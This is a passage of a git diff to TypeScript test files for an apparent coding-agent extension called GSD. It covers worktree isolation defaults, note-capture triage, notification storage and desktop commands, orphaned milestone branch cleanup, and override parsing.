-  assertEq(shouldUseWorktreeIsolation(), false, "shouldUseWorktreeIsolation() with branch prefs");
+  assert.deepStrictEqual(shouldUseWorktreeIsolation(), false, "shouldUseWorktreeIsolation() with branch prefs");
 } finally {
   removeRunnerPreferences();
   invalidateAllCaches();
 }
+});
 
-// Test 3: shouldUseWorktreeIsolation returns true for worktree
-console.log("Test 3: shouldUseWorktreeIsolation returns true for worktree");
+test('shouldUseWorktreeIsolation returns true for worktree', () => {
 try {
   writeRunnerPreferences("worktree");
   invalidateAllCaches();
-  assertEq(shouldUseWorktreeIsolation(), true, "shouldUseWorktreeIsolation() with worktree prefs");
+  assert.deepStrictEqual(shouldUseWorktreeIsolation(), true, "shouldUseWorktreeIsolation() with worktree prefs");
 } finally {
   removeRunnerPreferences();
   invalidateAllCaches();
 }
+});
 
-// Test 4: shouldUseWorktreeIsolation returns true for no prefs (default)
+// Test 4: shouldUseWorktreeIsolation returns false for no prefs (default: none)
+// Worktree isolation requires explicit opt-in — default is "none" so GSD
+// works out of the box without PREFERENCES.md (#2480).
 // Skip if global prefs exist — they override the default and this test
-// cannot control ~/.gsd/preferences.md.
-const globalPrefsExist = existsSync(join(homedir(), ".gsd", "preferences.md"))
-  || existsSync(join(homedir(), ".gsd", "PREFERENCES.md"));
-if (!globalPrefsExist) {
-  console.log("Test 4: shouldUseWorktreeIsolation returns true for no prefs (default)");
-  try {
-    removeRunnerPreferences(); // ensure no prefs file
-    invalidateAllCaches();
-    assertEq(shouldUseWorktreeIsolation(), true, "shouldUseWorktreeIsolation() with no prefs (default worktree)");
-  } finally {
-    invalidateAllCaches();
-  }
-} else {
-  console.log("Test 4: SKIPPED — global prefs file exists, cannot test bare default");
-}
+// cannot control ~/.gsd/PREFERENCES.md.
 
-// Test 5: getIsolationMode returns "none" with none prefs
-console.log("Test 5: getIsolationMode returns 'none' with none prefs");
+test('shouldUseWorktreeIsolation returns false for no prefs (default: none)', () => {
+  const globalPrefsExist = existsSync(join(homedir(), ".gsd", "PREFERENCES.md"))
+    || existsSync(join(homedir(), ".gsd", "PREFERENCES.md"));
+  if (!globalPrefsExist) {
+    try {
+      removeRunnerPreferences(); // ensure no prefs file
+      invalidateAllCaches();
+      assert.deepStrictEqual(shouldUseWorktreeIsolation(), false, "shouldUseWorktreeIsolation() with no prefs (default none)");
+    } finally {
+      invalidateAllCaches();
+    }
+  } else {
+  }
+});
+
+// Test 5: getIsolationMode returns "none" when no PREFERENCES.md exists (#2480)
+test('getIsolationMode returns "none" with no prefs (default)', () => {
+  const globalPrefsExist = existsSync(join(homedir(), ".gsd", "PREFERENCES.md"))
+    || existsSync(join(homedir(), ".gsd", "PREFERENCES.md"));
+  if (!globalPrefsExist) {
+    try {
+      removeRunnerPreferences();
+      invalidateAllCaches();
+      assert.deepStrictEqual(getIsolationMode(), "none", "getIsolationMode() with no prefs defaults to none");
+    } finally {
+      invalidateAllCaches();
+    }
+  }
+});
+
+test('getIsolationMode returns "none" with none prefs', () => {
 try {
   writeRunnerPreferences("none");
   invalidateAllCaches();
-  assertEq(getIsolationMode(), "none", "getIsolationMode() with none prefs");
+  assert.deepStrictEqual(getIsolationMode(), "none", "getIsolationMode() with none prefs");
 } finally {
   removeRunnerPreferences();
   invalidateAllCaches();
 }
+});
 
-// Test 6: getActiveAutoWorktreeContext returns null at baseline
-console.log("Test 6: getActiveAutoWorktreeContext returns null at baseline");
-assertEq(getActiveAutoWorktreeContext(), null, "getActiveAutoWorktreeContext() returns null without enterAutoWorktree()");
+test('getIsolationMode returns "worktree" with worktree prefs', () => {
+try {
+  writeRunnerPreferences("worktree");
+  invalidateAllCaches();
+  assert.deepStrictEqual(getIsolationMode(), "worktree", "getIsolationMode() with worktree prefs");
+} finally {
+  removeRunnerPreferences();
+  invalidateAllCaches();
+}
+});
+
+test('getIsolationMode returns "branch" with branch prefs', () => {
+try {
+  writeRunnerPreferences("branch");
+  invalidateAllCaches();
+  assert.deepStrictEqual(getIsolationMode(), "branch", "getIsolationMode() with branch prefs");
+} finally {
+  removeRunnerPreferences();
+  invalidateAllCaches();
+}
+});
+
+test('getActiveAutoWorktreeContext returns null at baseline', () => {
+assert.deepStrictEqual(getActiveAutoWorktreeContext(), null, "getActiveAutoWorktreeContext() returns null without enterAutoWorktree()");
+});
 
 // Test 7: System prompt worktree block absent without active worktree
-console.log("Test 7: System prompt worktree block absent without active worktree");
-{
-  const ctx = getActiveAutoWorktreeContext();
-  assertTrue(ctx === null, "getActiveAutoWorktreeContext() null confirms system prompt worktree block will not be injected");
-}
 
-report();
+test('Test 7: System prompt worktree block absent without active worktree', () => {
+  const ctx = getActiveAutoWorktreeContext();
+  assert.ok(ctx === null, "getActiveAutoWorktreeContext() null confirms system prompt worktree block will not be injected");
+});
+
diff --git a/src/resources/extensions/gsd/tests/note-captures-executed.test.ts b/src/resources/extensions/gsd/tests/note-captures-executed.test.ts
new file mode 100644
index 000000000..60c0a7a65
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/note-captures-executed.test.ts
@@ -0,0 +1,46 @@
+/**
+ * Regression test for #3578 — note captures marked as executed
+ *
+ * Note-classified captures were stuck in "resolved but not executed" limbo
+ * because executeTriageResolutions only handled inject/replan/defer. The fix
+ * adds a filter for classification === "note" and calls markCaptureExecuted
+ * for each matching capture.
+ *
+ * Structural verification test — reads source to confirm the note filter
+ * and markCaptureExecuted call exist.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, '..', 'triage-resolution.ts'), 'utf-8');
+
+describe('note captures executed in triage resolution (#3578)', () => {
+  test('markCaptureExecuted is imported', () => {
+    assert.match(source, /markCaptureExecuted/,
+      'markCaptureExecuted should be imported');
+  });
+
+  test('note classification filter exists', () => {
+    assert.match(source, /classification\s*===\s*"note"/,
+      'filter should check classification === "note"');
+  });
+
+  test('note filter checks resolved status and not-executed', () => {
+    assert.match(source, /status\s*===\s*"resolved"\s*&&\s*!c\.executed\s*&&\s*c\.classification\s*===\s*"note"/,
+      'filter should check resolved + not-executed + note classification');
+  });
+
+  test('markCaptureExecuted is called for note captures', () => {
+    // The source should call markCaptureExecuted for note captures
+    const noteSection = source.slice(source.indexOf('classification === "note"'));
+    assert.match(noteSection, /markCaptureExecuted\(basePath,\s*cap\.id\)/,
+      'markCaptureExecuted should be called for note captures');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/notification-overlay.test.ts b/src/resources/extensions/gsd/tests/notification-overlay.test.ts
new file mode 100644
index 000000000..2156a7710
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/notification-overlay.test.ts
@@ -0,0 +1,73 @@
+// GSD Extension — Notification Overlay Tests
+// Tests for message wrapping and content-fit sizing in the notification panel.
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+
+// The wrapText function is private to the module, so we test the overlay's
+// render output indirectly. We also extract and test wrapText logic directly.
+
+// ── wrapText logic (mirrors the private function) ───────────────────────────
+
+function wrapText(text: string, maxWidth: number): string[] {
+  if (text.length <= maxWidth) return [text];
+  const words = text.split(/\s+/);
+  const lines: string[] = [];
+  let current = "";
+  for (const word of words) {
+    if (current.length === 0) {
+      current = word;
+    } else if (current.length + 1 + word.length <= maxWidth) {
+      current += " " + word;
+    } else {
+      lines.push(current);
+      current = word;
+    }
+  }
+  if (current.length > 0) lines.push(current);
+  return lines.map((l) => l.length > maxWidth ? l.slice(0, maxWidth - 1) + "…" : l);
+}
+
+describe("notification overlay — wrapText", () => {
+  test("short text returns single line", () => {
+    const result = wrapText("hello world", 80);
+    assert.deepStrictEqual(result, ["hello world"]);
+  });
+
+  test("long text wraps at word boundaries", () => {
+    const text = "This is a long notification message that should wrap across multiple lines";
+    const result = wrapText(text, 40);
+    assert.ok(result.length > 1, `expected multiple lines, got ${result.length}`);
+    for (const line of result) {
+      assert.ok(line.length <= 40, `line exceeds maxWidth: "${line}" (${line.length})`);
+    }
+  });
+
+  test("single word exceeding maxWidth is truncated", () => {
+    const result = wrapText("superlongwordthatexceedsmaxwidth", 10);
+    assert.equal(result.length, 1);
+    assert.equal(result[0]!.length, 10);
+    assert.ok(result[0]!.endsWith("…"));
+  });
+
+  test("empty string returns single empty line", () => {
+    const result = wrapText("", 80);
+    assert.deepStrictEqual(result, [""]);
+  });
+
+  test("exact-fit text returns single line", () => {
+    const text = "exactly twenty chars";
+    const result = wrapText(text, 20);
+    assert.deepStrictEqual(result, [text]);
+  });
+
+  test("preserves all words across wrapped lines", () => {
+    const words = ["alpha", "bravo", "charlie", "delta", "echo", "foxtrot"];
+    const text = words.join(" ");
+    const result = wrapText(text, 15);
+    const rejoined = result.join(" ");
+    for (const w of words) {
+      assert.ok(rejoined.includes(w), `missing word: ${w}`);
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/notification-store.test.ts b/src/resources/extensions/gsd/tests/notification-store.test.ts
new file mode 100644
index 000000000..8f13fb873
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/notification-store.test.ts
@@ -0,0 +1,282 @@
+// GSD Extension — Notification Store Tests
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, readFileSync, existsSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  initNotificationStore,
+  appendNotification,
+  readNotifications,
+  markAllRead,
+  clearNotifications,
+  getUnreadCount,
+  getLineCount,
+  suppressPersistence,
+  unsuppressPersistence,
+  _resetNotificationStore,
+} from "../notification-store.js";
+
+describe("notification-store", () => {
+  let tmp: string;
+
+  beforeEach(() => {
+    tmp = mkdtempSync(join(tmpdir(), "gsd-notif-test-"));
+    mkdirSync(join(tmp, ".gsd"), { recursive: true });
+    _resetNotificationStore();
+  });
+
+  afterEach(() => {
+    _resetNotificationStore();
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  test("appendNotification creates file and writes entry", () => {
+    initNotificationStore(tmp);
+    appendNotification("test message", "info");
+
+    const filePath = join(tmp, ".gsd", "notifications.jsonl");
+    assert.ok(existsSync(filePath));
+
+    const content = readFileSync(filePath, "utf-8").trim();
+    const entry = JSON.parse(content);
+    assert.equal(entry.message, "test message");
+    assert.equal(entry.severity, "info");
+    assert.equal(entry.source, "notify");
+    assert.equal(entry.read, false);
+    assert.ok(entry.id);
+    assert.ok(entry.ts);
+  });
+
+  test("readNotifications returns newest-first", () => {
+    initNotificationStore(tmp);
+    appendNotification("first", "info");
+    appendNotification("second", "warning");
+    appendNotification("third", "error");
+
+    const entries = readNotifications();
+    assert.equal(entries.length, 3);
+    assert.equal(entries[0].message, "third");
+    assert.equal(entries[1].message, "second");
+    assert.equal(entries[2].message, "first");
+  });
+
+  test("getUnreadCount tracks appends", () => {
+    initNotificationStore(tmp);
+    assert.equal(getUnreadCount(), 0);
+
+    appendNotification("msg1", "info");
+    assert.equal(getUnreadCount(), 1);
+
+    appendNotification("msg2", "warning");
+    assert.equal(getUnreadCount(), 2);
+  });
+
+  test("markAllRead sets all entries to read", () => {
+    initNotificationStore(tmp);
+    appendNotification("msg1", "info");
+    appendNotification("msg2", "warning");
+
+    assert.equal(getUnreadCount(), 2);
+
+    markAllRead();
+
+    assert.equal(getUnreadCount(), 0);
+
+    const entries = readNotifications();
+    assert.ok(entries.every((e) => e.read === true));
+  });
+
+  test("clearNotifications empties the file", () => {
+    initNotificationStore(tmp);
+    appendNotification("msg1", "info");
+    appendNotification("msg2", "error");
+
+    assert.equal(getLineCount(), 2);
+
+    clearNotifications();
+
+    assert.equal(getLineCount(), 0);
+    assert.equal(getUnreadCount(), 0);
+    assert.equal(readNotifications().length, 0);
+  });
+
+  test("rotation keeps only 500 entries", () => {
+    initNotificationStore(tmp);
+
+    for (let i = 0; i < 510; i++) {
+      appendNotification(`msg-${i}`, "info");
+    }
+
+    const entries = readNotifications();
+    assert.ok(entries.length <= 500, `Expected <= 500 entries, got ${entries.length}`);
+    // Most recent should be msg-509
+    assert.equal(entries[0].message, "msg-509");
+  });
+
+  test("source field is preserved", () => {
+    initNotificationStore(tmp);
+    appendNotification("from notify", "info", "notify");
+    appendNotification("from logger", "warning", "workflow-logger");
+
+    const entries = readNotifications();
+    assert.equal(entries[0].source, "workflow-logger");
+    assert.equal(entries[1].source, "notify");
+  });
+
+  test("messages are truncated at 500 chars", () => {
+    initNotificationStore(tmp);
+    const longMsg = "x".repeat(600);
+    appendNotification(longMsg, "info");
+
+    const entries = readNotifications();
+    assert.ok(entries[0].message.length <= 501); // 500 + "…"
+    assert.ok(entries[0].message.endsWith("…"));
+  });
+
+  test("readNotifications with explicit basePath works", () => {
+    initNotificationStore(tmp);
+    appendNotification("msg1", "info");
+
+    // Read with explicit basePath
+    _resetNotificationStore();
+    const entries = readNotifications(tmp);
+    assert.equal(entries.length, 1);
+    assert.equal(entries[0].message, "msg1");
+  });
+
+  test("init seeds counters from existing file", () => {
+    initNotificationStore(tmp);
+    appendNotification("msg1", "info");
+    appendNotification("msg2", "warning");
+
+    // Reset and re-init — should seed from disk
+    _resetNotificationStore();
+    initNotificationStore(tmp);
+
+    assert.equal(getLineCount(), 2);
+    assert.equal(getUnreadCount(), 2);
+  });
+
+  test("no-op when store not initialized", () => {
+    // Should not throw
+    appendNotification("msg", "info");
+    assert.equal(readNotifications().length, 0);
+    assert.equal(getUnreadCount(), 0);
+  });
+
+  test("suppressPersistence prevents writes", () => {
+    initNotificationStore(tmp);
+    appendNotification("before", "info");
+    assert.equal(getLineCount(), 1);
+
+    suppressPersistence();
+    appendNotification("suppressed", "info");
+    assert.equal(getLineCount(), 1); // still 1
+
+    unsuppressPersistence();
+    appendNotification("after", "info");
+    assert.equal(getLineCount(), 2); // now 2
+
+    const entries = readNotifications();
+    assert.equal(entries[0].message, "after");
+    assert.equal(entries[1].message, "before");
+    // "suppressed" should not appear
+    assert.ok(!entries.some((e) => e.message === "suppressed"));
+  });
+
+  test("suppressPersistence is ref-counted", () => {
+    initNotificationStore(tmp);
+    suppressPersistence();
+    suppressPersistence();
+    unsuppressPersistence();
+    // Still suppressed (one suppress remaining)
+    appendNotification("still suppressed", "info");
+    assert.equal(getLineCount(), 0);
+
+    unsuppressPersistence();
+    appendNotification("now works", "info");
+    assert.equal(getLineCount(), 1);
+  });
+
+  test("reinit switches to new project path", () => {
+    const tmp2 = mkdtempSync(join(tmpdir(), "gsd-notif-test2-"));
+    mkdirSync(join(tmp2, ".gsd"), { recursive: true });
+
+    initNotificationStore(tmp);
+    appendNotification("project1", "info");
+
+    // Switch to new project
+    initNotificationStore(tmp2);
+    appendNotification("project2", "info");
+
+    // project2 should only have its own entry
+    const entries = readNotifications();
+    assert.equal(entries.length, 1);
+    assert.equal(entries[0].message, "project2");
+
+    // project1 should still have its entry
+    const p1Entries = readNotifications(tmp);
+    assert.equal(p1Entries.length, 1);
+    assert.equal(p1Entries[0].message, "project1");
+
+    rmSync(tmp2, { recursive: true, force: true });
+  });
+
+  test("counters resync from disk after markAllRead", () => {
+    initNotificationStore(tmp);
+    appendNotification("msg1", "info");
+    appendNotification("msg2", "info");
+    assert.equal(getUnreadCount(), 2);
+    assert.equal(getLineCount(), 2);
+
+    markAllRead();
+    assert.equal(getUnreadCount(), 0);
+    assert.equal(getLineCount(), 2); // entries still exist, just marked read
+  });
+
+  test("counters resync from disk after clearNotifications", () => {
+    initNotificationStore(tmp);
+    appendNotification("msg1", "info");
+    appendNotification("msg2", "info");
+
+    clearNotifications();
+    assert.equal(getUnreadCount(), 0);
+    assert.equal(getLineCount(), 0);
+  });
+
+  test("markAllRead does not delete a foreign lock file", () => {
+    initNotificationStore(tmp);
+    appendNotification("msg1", "info");
+
+    // Simulate another process holding the lock
+    const lockPath = join(tmp, ".gsd", "notifications.lock");
+    writeFileSync(lockPath, String(Date.now()), "utf-8");
+
+    // markAllRead should still work (best-effort) but not delete the foreign lock
+    markAllRead();
+
+    assert.ok(existsSync(lockPath), "foreign lock file should not be deleted");
+
+    // Clean up the lock so afterEach doesn't leave artifacts
+    rmSync(lockPath, { force: true });
+  });
+
+  test("clearNotifications does not delete a foreign lock file", () => {
+    initNotificationStore(tmp);
+    appendNotification("msg1", "info");
+
+    // Simulate another process holding the lock
+    const lockPath = join(tmp, ".gsd", "notifications.lock");
+    writeFileSync(lockPath, String(Date.now()), "utf-8");
+
+    // clearNotifications should still work but not delete the foreign lock
+    clearNotifications();
+
+    assert.ok(existsSync(lockPath), "foreign lock file should not be deleted");
+
+    rmSync(lockPath, { force: true });
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/notifications.test.ts b/src/resources/extensions/gsd/tests/notifications.test.ts
index f889ab2b0..0331f5956 100644
--- a/src/resources/extensions/gsd/tests/notifications.test.ts
+++ b/src/resources/extensions/gsd/tests/notifications.test.ts
@@ -4,6 +4,7 @@ import assert from "node:assert/strict";
 import {
   buildDesktopNotificationCommand,
   shouldSendDesktopNotification,
+  formatNotificationTitle,
 } from "../notifications.js";
 import type { NotificationPreferences } from "../types.js";
 
@@ -31,7 +32,10 @@ test("shouldSendDesktopNotification disables all categories when notifications a
   assert.equal(shouldSendDesktopNotification("milestone", prefs), false);
 });
 
-test("buildDesktopNotificationCommand uses argument arrays for macOS notifications", () => {
+test("buildDesktopNotificationCommand falls back to osascript on macOS when terminal-notifier is absent", () => {
+  // When terminal-notifier is not on PATH, falls back to osascript.
+  // This test runs in CI where terminal-notifier is typically not installed.
+  // If terminal-notifier IS installed, we verify it returns that instead.
   const command = buildDesktopNotificationCommand(
     "darwin",
     `Bob's "Milestone"`,
@@ -40,11 +44,30 @@ test("buildDesktopNotificationCommand uses argument arrays for macOS notificatio
   );
 
   assert.ok(command);
-  assert.equal(command.file, "osascript");
-  assert.deepEqual(command.args.slice(0, 1), ["-e"]);
-  assert.match(command.args[1], /Bob's \\"Milestone\\"/);
-  assert.match(command.args[1], /Budget! Path: C:\\\\temp/);
-  assert.doesNotMatch(command.args[1], /\n/);
+  if (command.file.includes("terminal-notifier")) {
+    // terminal-notifier path — verify args structure
+    assert.ok(command.args.includes("-title"));
+    assert.ok(command.args.includes("-message"));
+    assert.ok(command.args.includes("-sound"));
+    assert.ok(command.args.includes("Basso")); // error level
+  } else {
+    // osascript fallback path
+    assert.equal(command.file, "osascript");
+    assert.deepEqual(command.args.slice(0, 1), ["-e"]);
+    assert.match(command.args[1], /Bob's \\"Milestone\\"/);
+    assert.match(command.args[1], /Budget! Path: C:\\\\temp/);
+    assert.doesNotMatch(command.args[1], /\n/);
+  }
+});
+
+test("buildDesktopNotificationCommand uses Glass sound for non-error on macOS", () => {
+  const command = buildDesktopNotificationCommand("darwin", "Title", "Message", "info");
+  assert.ok(command);
+  if (command.file.includes("terminal-notifier")) {
+    assert.ok(command.args.includes("Glass"));
+  } else {
+    assert.match(command.args[1], /sound name "Glass"/);
+  }
 });
 
 test("buildDesktopNotificationCommand preserves literal shell characters on linux", () => {
@@ -65,3 +88,47 @@ test("buildDesktopNotificationCommand preserves literal shell characters on linu
 test("buildDesktopNotificationCommand skips unsupported platforms", () => {
   assert.equal(buildDesktopNotificationCommand("win32", "Title", "Message"), null);
 });
+
+// ─── formatNotificationTitle — project context in notifications (#2708) ──────
+
+test("formatNotificationTitle returns 'GSD' when no project name is given", () => {
+  assert.equal(formatNotificationTitle(), "GSD");
+  assert.equal(formatNotificationTitle(undefined), "GSD");
+  assert.equal(formatNotificationTitle(""), "GSD");
+});
+
+test("formatNotificationTitle includes project name when provided", () => {
+  assert.equal(formatNotificationTitle("my-app"), "GSD — my-app");
+});
+
+test("formatNotificationTitle trims whitespace from project name", () => {
+  assert.equal(formatNotificationTitle("  spaced  "), "GSD — spaced");
+});
+
+test("buildDesktopNotificationCommand includes project name in title on linux", () => {
+  const command = buildDesktopNotificationCommand(
+    "linux",
+    formatNotificationTitle("my-project"),
+    "All milestones complete!",
+    "success",
+  );
+  assert.ok(command);
+  assert.equal(command.args[2], "GSD — my-project");
+  assert.equal(command.args[3], "All milestones complete!");
+});
+
+test("buildDesktopNotificationCommand includes project name in title on macOS", () => {
+  const command = buildDesktopNotificationCommand(
+    "darwin",
+    formatNotificationTitle("my-project"),
+    "Budget 90%",
+    "warning",
+  );
+  assert.ok(command);
+  if (command.file.includes("terminal-notifier")) {
+    const titleIdx = command.args.indexOf("-title");
+    assert.equal(command.args[titleIdx + 1], "GSD — my-project");
+  } else {
+    assert.match(command.args[1], /GSD — my-project/);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/orphaned-worktree-audit.test.ts b/src/resources/extensions/gsd/tests/orphaned-worktree-audit.test.ts
new file mode 100644
index 000000000..a8c431254
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/orphaned-worktree-audit.test.ts
@@ -0,0 +1,189 @@
+// GSD2 — Tests for auditOrphanedMilestoneBranches bootstrap audit
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, realpathSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execSync } from "node:child_process";
+
+import { auditOrphanedMilestoneBranches } from "../auto-start.ts";
+import { openDatabase, closeDatabase, insertMilestone, updateMilestoneStatus } from "../gsd-db.ts";
+
+function run(cmd: string, cwd: string): string {
+  return execSync(cmd, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+/** Create a temp git repo with .gsd structure and DB. */
+function createRepo(): string {
+  const dir = realpathSync(mkdtempSync(join(tmpdir(), "orphan-audit-test-")));
+  run("git init", dir);
+  run("git config user.email test@test.com", dir);
+  run("git config user.name Test", dir);
+
+  writeFileSync(join(dir, "README.md"), "# test\n");
+  run("git add .", dir);
+  run("git commit -m init", dir);
+  run("git branch -M main", dir);
+
+  // Create .gsd structure on disk (not tracked in git)
+  mkdirSync(join(dir, ".gsd", "milestones", "M001"), { recursive: true });
+
+  return dir;
+}
+
+describe("auditOrphanedMilestoneBranches", () => {
+  let dir: string;
+
+  beforeEach(() => {
+    dir = createRepo();
+    openDatabase(join(dir, ".gsd", "gsd.db"));
+  });
+
+  afterEach(() => {
+    closeDatabase();
+    rmSync(dir, { recursive: true, force: true });
+  });
+
+  test("no milestone branches → no-op", () => {
+    const result = auditOrphanedMilestoneBranches(dir, "worktree");
+    assert.deepStrictEqual(result.recovered, []);
+    assert.deepStrictEqual(result.warnings, []);
+  });
+
+  test("skips in none isolation mode", () => {
+    // Create a milestone branch that would otherwise be detected
+    run("git branch milestone/M001", dir);
+    insertMilestone({ id: "M001", title: "Test", status: "complete" });
+
+    const result = auditOrphanedMilestoneBranches(dir, "none");
+    assert.deepStrictEqual(result.recovered, []);
+    assert.deepStrictEqual(result.warnings, []);
+
+    // Branch should still exist
+    const branches = run("git branch --list milestone/M001", dir);
+    assert.ok(branches.includes("milestone/M001"), "branch should be preserved in none mode");
+  });
+
+  test("deletes merged branch for completed milestone", () => {
+    // Create milestone branch from main (so it's already merged)
+    run("git branch milestone/M001", dir);
+    insertMilestone({ id: "M001", title: "Test", status: "complete" });
+
+    const result = auditOrphanedMilestoneBranches(dir, "worktree");
+
+    assert.ok(result.recovered.length > 0, "should have recovered actions");
+    assert.ok(
+      result.recovered.some(r => r.includes("Deleted merged branch milestone/M001")),
+      "should report branch deletion",
+    );
+    assert.deepStrictEqual(result.warnings, []);
+
+    // Branch should be gone
+    const branches = run("git branch --list milestone/M001", dir);
+    assert.deepStrictEqual(branches, "", "branch should be deleted");
+  });
+
+  test("warns about unmerged branch for completed milestone", () => {
+    // Create milestone branch with divergent commits (not merged into main)
+    run("git checkout -b milestone/M001", dir);
+    writeFileSync(join(dir, "feature.txt"), "new feature\n");
+    run("git add feature.txt", dir);
+    run("git commit -m \"add feature on milestone branch\"", dir);
+    run("git checkout main", dir);
+
+    insertMilestone({ id: "M001", title: "Test", status: "complete" });
+
+    const result = auditOrphanedMilestoneBranches(dir, "worktree");
+
+    assert.deepStrictEqual(result.recovered, [], "should not delete unmerged branch");
+    assert.ok(result.warnings.length > 0, "should have warnings");
+    assert.ok(
+      result.warnings.some(w => w.includes("NOT merged")),
+      "should warn about unmerged branch",
+    );
+
+    // Branch should still exist (data safety)
+    const branches = run("git branch --list milestone/M001", dir);
+    assert.ok(branches.includes("milestone/M001"), "unmerged branch must be preserved");
+  });
+
+  test("skips active (non-complete) milestone branches", () => {
+    run("git branch milestone/M001", dir);
+    insertMilestone({ id: "M001", title: "Test", status: "active" });
+
+    const result = auditOrphanedMilestoneBranches(dir, "worktree");
+
+    assert.deepStrictEqual(result.recovered, []);
+    assert.deepStrictEqual(result.warnings, []);
+
+    // Branch should still exist
+    const branches = run("git branch --list milestone/M001", dir);
+    assert.ok(branches.includes("milestone/M001"), "active milestone branch should be preserved");
+  });
+
+  test("cleans up orphaned worktree directory for merged milestone", () => {
+    // Create milestone branch (merged — same as main)
+    run("git branch milestone/M001", dir);
+    insertMilestone({ id: "M001", title: "Test", status: "complete" });
+
+    // Create orphaned worktree directory
+    const wtDir = join(dir, ".gsd", "worktrees", "M001");
+    mkdirSync(wtDir, { recursive: true });
+    writeFileSync(join(wtDir, "leftover.txt"), "orphaned file\n");
+
+    const result = auditOrphanedMilestoneBranches(dir, "worktree");
+
+    assert.ok(result.recovered.length > 0, "should have recovered actions");
+    assert.ok(
+      result.recovered.some(r => r.includes("worktree directory")),
+      "should report worktree cleanup",
+    );
+
+    // Worktree directory should be cleaned up
+    assert.ok(!existsSync(wtDir), "orphaned worktree directory should be removed");
+  });
+
+  test("handles multiple milestones with mixed states", () => {
+    // M001: complete, branch merged → should clean up
+    run("git branch milestone/M001", dir);
+    insertMilestone({ id: "M001", title: "First", status: "complete" });
+
+    // M002: active, branch exists → should skip
+    run("git branch milestone/M002", dir);
+    insertMilestone({ id: "M002", title: "Second", status: "active" });
+
+    const result = auditOrphanedMilestoneBranches(dir, "worktree");
+
+    // M001 should be cleaned up
+    assert.ok(
+      result.recovered.some(r => r.includes("M001")),
+      "should clean up completed M001",
+    );
+
+    // M002 should not be touched
+    const branches = run("git branch --list milestone/M002", dir);
+    assert.ok(branches.includes("milestone/M002"), "active M002 branch should be preserved");
+  });
+
+  test("works in branch isolation mode", () => {
+    run("git branch milestone/M001", dir);
+    insertMilestone({ id: "M001", title: "Test", status: "complete" });
+
+    const result = auditOrphanedMilestoneBranches(dir, "branch");
+
+    assert.ok(result.recovered.length > 0, "should work in branch mode too");
+    assert.ok(
+      result.recovered.some(r => r.includes("Deleted merged branch")),
+      "should delete branch in branch mode",
+    );
+  });
+
+  test("handles milestone in DB but no branch (no-op)", () => {
+    insertMilestone({ id: "M001", title: "Test", status: "complete" });
+
+    const result = auditOrphanedMilestoneBranches(dir, "worktree");
+
+    assert.deepStrictEqual(result.recovered, []);
+    assert.deepStrictEqual(result.warnings, []);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/overrides.test.ts b/src/resources/extensions/gsd/tests/overrides.test.ts
index f8302d03c..fbc5087f6 100644
--- a/src/resources/extensions/gsd/tests/overrides.test.ts
+++ b/src/resources/extensions/gsd/tests/overrides.test.ts
@@ -1,15 +1,14 @@
 // GSD Extension - Override Tests
 // Tests for parseOverrides, appendOverride, loadActiveOverrides, formatOverridesSection, resolveAllOverrides
 
+import { describe, test, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, readFileSync, writeFileSync, rmSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
-import { createTestContext } from './test-helpers.ts';
 import { parseOverrides, appendOverride, loadActiveOverrides, formatOverridesSection, resolveAllOverrides } from '../files.ts';
 import type { Override } from '../files.ts';
 
-const { assertEq, assertTrue, assertMatch, assertNoMatch, report } = createTestContext();
-
 const tempDirs: string[] = [];
 
 function makeTempDir(prefix: string): string {
@@ -26,106 +25,100 @@ function cleanup(): void {
   tempDirs.length = 0;
 }
 
-console.log('\n=== parseOverrides: empty content ===');
-{ const result = parseOverrides(""); assertEq(result.length, 0, "empty content returns no overrides"); }
+describe('overrides', () => {
+  afterEach(() => cleanup());
 
-console.log('\n=== parseOverrides: single active override ===');
-{
-  const content = `# GSD Overrides\n\nUser-issued overrides that supersede plan document content.\n\n---\n\n## Override: 2026-03-14T10:00:00.000Z\n\n**Change:** Use Postgres instead of SQLite\n**Scope:** active\n**Applied-at:** M001/S02/T03\n\n---\n`;
-  const result = parseOverrides(content);
-  assertEq(result.length, 1, "parses one override");
-  assertEq(result[0].timestamp, "2026-03-14T10:00:00.000Z", "correct timestamp");
-  assertEq(result[0].change, "Use Postgres instead of SQLite", "correct change");
-  assertEq(result[0].scope, "active", "correct scope");
-  assertEq(result[0].appliedAt, "M001/S02/T03", "correct appliedAt");
-}
+  test('parseOverrides: empty content', () => {
+    const result = parseOverrides(""); assert.deepStrictEqual(result.length, 0, "empty content returns no overrides");
+  });
 
-console.log('\n=== parseOverrides: multiple overrides, mixed scopes ===');
-{
-  const content = `# GSD Overrides\n\n---\n\n## Override: 2026-03-14T10:00:00.000Z\n\n**Change:** Use Postgres instead of SQLite\n**Scope:** resolved\n**Applied-at:** M001/S02/T03\n\n---\n\n## Override: 2026-03-14T11:00:00.000Z\n\n**Change:** Use JWT instead of session cookies\n**Scope:** active\n**Applied-at:** M001/S03/T01\n\n---\n`;
-  const result = parseOverrides(content);
-  assertEq(result.length, 2, "parses two overrides");
-  assertEq(result[0].scope, "resolved", "first is resolved");
-  assertEq(result[1].scope, "active", "second is active");
